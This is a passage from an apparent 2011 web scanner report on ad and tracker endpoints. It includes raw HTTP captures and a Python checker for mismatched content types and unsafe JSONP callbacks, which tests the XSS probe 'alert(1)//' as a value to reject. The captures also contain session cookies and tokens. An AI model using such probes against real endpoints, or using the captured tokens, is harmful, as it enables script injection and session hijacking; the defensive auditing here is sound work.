User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 285

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719992/direct;ai.227792773;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.20. http://view.atdmt.com/SPT/iview/194719993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719993/direct/01

Request

GET /SPT/iview/194719993/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:35 GMT
Connection: close
Content-Length: 286

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719993/direct;ai.234127148;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.21. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /jaction/m0nssc_20HomePageConsumerBase_1

Request

GET /jaction/m0nssc_20HomePageConsumerBase_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:34 GMT
Connection: close
Content-Length: 474

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://switch.atdmt.com/action','http://r.turn.com/r/beacon?b2=ItQ
...[SNIP]...

25.22. http://w55c.net/ct/cms-2-frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w55c.net
Path:   /ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Sun, 04 Sep 2011 01:55:48 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 30 Aug 2011 13:17:28 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 3875
Connection: close
Date: Sun, 04 Sep 2011 00:55:48 GMT
Server: w55c.net

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...

25.23. https://www.sprint.net/performance/gen_line_xml.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Request

GET /performance/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 301119

<line>
   <start_x>982.22222222222</start_x>
   <start_y>205.31944444444</start_y>
   <end_x>984.10617777778</end_x>
   <end_y>212.28597238889</end_y>
   <ctrl_x>986.6642</ctrl_x>
   <ctrl_y>211.80270841667</ctrl
...[SNIP]...

25.24. https://www.sprint.net/performance/gen_pop_xml.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Request

GET /performance/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91549

<pop>
   <market_full>Nashville, TN</market_full>
   <market_short>nsh</market_short>
   <x>984.14638604058</x>
   <y>221.96406860352</y>
   <color>1</color>
   <region>na</region>
   <position>C</position>
   <probe
...[SNIP]...

25.25. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbee/CA/Sacramento.html

Request

GET /auto/sacbee/CA/Sacramento.html?threeday=1&width=316 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dottag.42=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.287
Set-Cookie: ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 1120


<html>
<head>
   <style type="text/css">
       body { font-family: Arial,Helvetica,sans-serif; font-size: 12px; }
       td { font-size: 12px; }
   </style>
</head>
<body>
       <div style="width: 316px;">
       <div cla
...[SNIP]...

26. Content type incorrectly stated
There are 18 instances of this issue:

Issue background

If a web response specifies an incorrect content type, browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, the browser will usually attempt to parse and render the response in that format: a JavaScript or JSON body served as text/html, for example, is parsed as an HTML document when its URL is opened directly. If the specified type is an image format, the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type (MIME sniffing; the X-Content-Type-Options: nosniff header disables this). Either case can lead to unexpected results, and if the content contains any user-controllable data it may lead to cross-site scripting or other client-side vulnerabilities. Most of the instances below are JSONP and ad-serving endpoints that return script under a text/html, text/plain or application/json type. In those, the function name at the start of the body is copied from a request parameter (callback, cb), so the question to ask of each is whether that parameter is restricted to JavaScript identifier characters before it is echoed.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-Type header which correctly and unambiguously states the MIME type of the content in the response body. Script, including JSONP, should be served with a JavaScript type (text/javascript or application/javascript) together with X-Content-Type-Options: nosniff, so that browsers neither render it as HTML nor second-guess the stated type. A JSONP endpoint should additionally reject any callback value that is not a dotted JavaScript identifier, since that value is written verbatim into the response body.
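The check behind this issue class, reproduced below as an added example on four of the responses captured in this section. This is illustrative code written for this page, not the scanner's own logic: the body-sniffing heuristics are a simplified approximation of what a scanner does, and the callback_param argument assumes the caller knows which request parameter supplied the JSONP function name (callback for reuters.com and snas.nbcuni.com, the Twitter widget's callback parameter for api.twitter.com). The sample responses are the captures above with their headers trimmed to the ones the check reads.

```python
import re

# Coarse categories, in the vocabulary this report uses, for Content-Type values.
STATED_TYPES = {
    "text/html": "HTML",
    "application/xhtml+xml": "HTML",
    "text/plain": "plain text",
    "text/css": "CSS",
    "application/json": "JSON",
    "text/javascript": "script",
    "application/javascript": "script",
    "application/x-javascript": "script",
}

# A JSONP callback name must be a dotted JavaScript identifier and nothing else;
# quotes, brackets or angle brackets in the name mean the value must be rejected.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
# Body-shape heuristics (an approximation, not the scanner's classifier).
CALL_AT_START = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*\s*\(")
ASSIGN_AT_START = re.compile(r"^[A-Za-z_$][\w$.]*\s*=[^=]")
JS_KEYWORD_AT_START = re.compile(r"^(function|var|if|return|try)\b")
HTML_AT_START = re.compile(r"<(!doctype|!--|html|head|body|div|script|a\b|img)", re.I)
CSS_RULE_AT_START = re.compile(r"^[.#\w\s,:>-]+\{")


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def stated_type(headers):
    """What the Content-Type header claims, ignoring the charset parameter."""
    mime = headers.get("content-type", "").split(";")[0].strip().lower()
    return STATED_TYPES.get(mime, mime or "(none)")


def sniff_body(body):
    """Guess what the body really is, in the same coarse vocabulary."""
    s = body.strip()
    if HTML_AT_START.match(s):
        return "HTML"
    if s.startswith(("{", "[")):
        return "JSON"
    if CALL_AT_START.match(s) or ASSIGN_AT_START.match(s) or JS_KEYWORD_AT_START.match(s):
        return "script"  # JSONP call, object assignment, function definition, etc.
    if CSS_RULE_AT_START.match(s):
        return "CSS"
    if s.endswith(";"):  # e.g. the bare "true;" served by rt.legolas-media.com
        return "script"
    return "plain text"


def check_response(raw, callback_param=None):
    """Compare stated vs. sniffed type and, for JSONP endpoints, inspect the callback."""
    _, headers, body = split_response(raw)
    stated, actual = stated_type(headers), sniff_body(body)
    result = {
        "stated": stated,
        "actual": actual,
        "mismatch": stated != actual,
        # nosniff stops the browser from second-guessing the stated type.
        "nosniff": headers.get("x-content-type-options", "").lower() == "nosniff",
        "callback_reflected": None,
        "callback_safe": None,
    }
    if callback_param is not None:
        result["callback_reflected"] = callback_param in body
        result["callback_safe"] = bool(SAFE_CALLBACK.match(callback_param))
    return result


# Captures from this section, headers trimmed to the ones the check reads.
REUTERS_FP = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
              "if (typeof Reuters.utils.showRecommendations === 'function') "
              "{Reuters.utils.showRecommendations([]);}")
NBC_COOKIES = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
               '__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});')
FB_STATUS = ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
             "Invalid Application ID")
TWITTER_LIST = ("HTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8\r\n"
                "X-Content-Type-Options: nosniff\r\n\r\n"
                "TWTR.Widget.receiveCallback_1([]);")

if __name__ == "__main__":
    for name, raw, cb in [("reuters", REUTERS_FP, "Reuters.utils.showRecommendations"),
                          ("nbcuni", NBC_COOKIES, "__nbcsnasadops.doSCallback"),
                          ("facebook", FB_STATUS, None),
                          ("twitter", TWITTER_LIST, "TWTR.Widget.receiveCallback_1")]:
        print(name, check_response(raw, cb))
    # A callback value a JSONP endpoint must refuse rather than echo:
    print("alert(1)// accepted?", bool(SAFE_CALLBACK.match("alert(1)//")))
```

The mismatch flag alone is what the scanner reports; the two callback fields are the follow-up a reviewer has to do by hand, because a JSONP response served as text/html (the snas.nbcuni.com case) is only safe if the echoed name can never contain markup.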


26.1. http://ad.doubleclick.net/adj/sacbee_cim/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/sacbee_cim/

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually contains script: a document.write() call that injects the ad markup.

Request

GET /adj/sacbee_cim/;dcove=o;share=partnersoldinvite;sz=24x24;dcmt=text/html;ord=1315097366526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 313
Date: Sun, 04 Sep 2011 00:48:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;240490578;0-0;1;46669306;3634-24/24;41913949/41931736/1;;~aopt=2/2/95/0;~sscs=%3fhttp://www.meebo.com/blank.h
...[SNIP]...

26.2. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/mi.sac00/News/State/GovtPolitics

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually contains script: a JavaScript object assignment (MeeboAdPayload = {...}), not the CSS the scanner heuristics reported.

Request

GET /pfadx/mi.sac00/News/State/GovtPolitics;dcove=d;lvl6=Product:%20Blogs:%20Moveable%20Type:%20Sacramento%20Bee%20--%20The%20State%20Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;ord=0123456789? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1068
DCLK_imp: v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacramento Bee -- The State Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;~cs=o
Date: Sun, 04 Sep 2011 00:48:38 GMT

MeeboAdPayload = {type: "Partner", ad: {"impression": "http://ad.doubleclick.net/imp;v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacrame
...[SNIP]...

26.3. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The response contains the following Content-type statement: application/json; charset=utf-8. The response states that it contains JSON. However, it actually contains script: a JSONP call, TWTR.Widget.receiveCallback_1([]), whose function name is copied from the callback parameter of the request. Note that the response also carries X-Content-Type-Options: nosniff; browsers that enforce nosniff on script loads will not execute a response served as application/json, so in those browsers the mismatch cannot be bridged by MIME sniffing.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110147983668019200&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315097070986=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315097213-36482-17537
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 00:46:53 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.03541
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9d4c870c9296f3cdf37ddb0b78039db1ef7aa6d3
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

26.4. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://html2.scribdassets.com
Path:   /7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. The body is a JSONP call, window.page4_callback([...]), whose string argument carries the HTML markup of the rendered page, so the stated script type is correct; the HTML classification is a false positive caused by the embedded markup.

Request

GET /7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp HTTP/1.1
Host: html2.scribdassets.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content_inner?start_page=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:09:46 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n17 ( lax-agg-n8), ht lax-agg-n8.panthercdn.com
ETag: "8b1ce572199864d6c5e04c76b1b236ed"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 23:02:48 GMT
Age: 266818
Content-Length: 5874
Content-Type: application/x-javascript
Content-Disposition: inline;filename=4-ecd404f5dc.jsonp
Vary: Accept-Encoding
Last-Modified: Wed, 31 Aug 2011 23:01:17 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: keep-alive

window.page4_callback(["<div class=\"newpage\" id=\"page4\" style=\"width: 902px; height:1167px\">\n<div class=text_layer style=\"z-index:2\"><div class=ie_fix>\n&nbsp;\n<div class=\"ff6\" style=\"fon
...[SNIP]...

26.5. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually contains script: a document.write() call that injects an iframe whose URL repeats the tid, type and clicktrack parameters of the request.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

26.6. http://js.www.reuters.com/recommend/re/fp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.www.reuters.com
Path:   /recommend/re/fp

Issue detail

The response contains the following Content-type statement: text/plain. The response states that it contains plain text. However, it actually contains script: a JSONP call guarded by a typeof check, with the function name (Reuters.utils.showRecommendations) copied from the callback parameter of the request.

Request

GET /recommend/re/fp?ed=us&type=article&id=USTRE78222D20110904&howMany=5&callback=Reuters.utils.showRecommendations&refreshUrlTimestamp=1315097313687 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:59 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:54:00 GMT
max-age: 300000
Content-Type: text/plain
Content-Length: 103

if (typeof Reuters.utils.showRecommendations === 'function') {Reuters.utils.showRecommendations([]);}

26.7. http://rma-api.gravity.com/v1/beacons/initialize

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The response contains the following Content-type statement: text/javascript;charset=UTF-8. The response states that it contains script, and the body, GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839'), is a JavaScript call, so the stated type is correct and the plain-text classification is a false positive. Note that the second argument is the value of the vaguid cookie sent in the request, echoed into the script body.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

26.8. http://rt.disqus.com/forums/realtime-cached.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.disqus.com
Path:   /forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script, and the body, DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43"), is a JavaScript call, so the stated type is correct and the plain-text classification is a false positive. The second argument repeats the timestamp parameter of the request.

Request

GET /forums/realtime-cached.js?timestamp=2010-12-08_19:48:43&thread_id=404039983&f=charlotteobserver&1315097151149 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315097127.2; __utmb=113869458.1.10.1315097127; __utmc=113869458; __utmz=113869458.1315097127.2.2.utmcsr=charlotteobserver.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/03/2577566/raceday-danica-already-gone.html

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:45:13 GMT
